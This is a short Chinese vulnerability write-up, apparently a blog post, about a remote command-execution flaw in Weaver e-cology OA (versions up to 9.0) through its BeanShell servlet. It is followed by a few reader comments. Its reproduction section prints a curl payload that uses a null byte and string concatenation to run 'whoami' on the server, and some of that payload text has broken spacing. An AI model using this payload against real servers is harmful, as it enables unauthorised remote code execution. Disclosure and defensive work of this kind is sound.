AI智能摘要
你是否想过,一个办公系统竟会成为黑客入侵的突破口?泛微OA多版本被曝存在高危命令执行漏洞,攻击者只需构造特定请求,便可远程获取服务器权限,后果不堪设想。本文详细揭示漏洞成因、影响范围及复现过程,带你直击安全防线的致命缺口,每一位系统管理员和技术人员都不可错过。
— AI 生成的文章内容摘要
0x01漏洞描述
泛微OA办公系统是一款协调办公软件。
泛微协同商务软件系统weaver e-cology 8存在命令执行漏洞,攻击者可利用该漏洞获取服务器权限。
0x02漏洞危害
攻击者可以通过精心构造的请求包在受影响版本的泛微OA上进行远程代码执行。
0x03影响范围
泛微 e-cology<=9.0
0x04漏洞复现
访问 http://url/weaver/bsh.servlet.BshServleth 输入 payload 如下:

漏洞路径:/weaver/bsh.servlet.BshServlet exec("whoami") curl http://xx.xx.xx.xx.xx/weaver/bsh.servlet.BshServlet/ -d 'bsh.script=ev al%00("ex"%2b"ec(/"whoami/")");&bsh.servlet.captureOutErr=true&bsh.servlet.outp ut=raw'

泰国 1F
这漏洞听着挺可怕,内网没打补丁的要赶紧排查。
广东省广州市 2F
curl那段payload看着就晦涩,能不能贴个解码后的示例?
越南 3F
感觉厂商更新太慢了,老版本还在用的公司风险好大。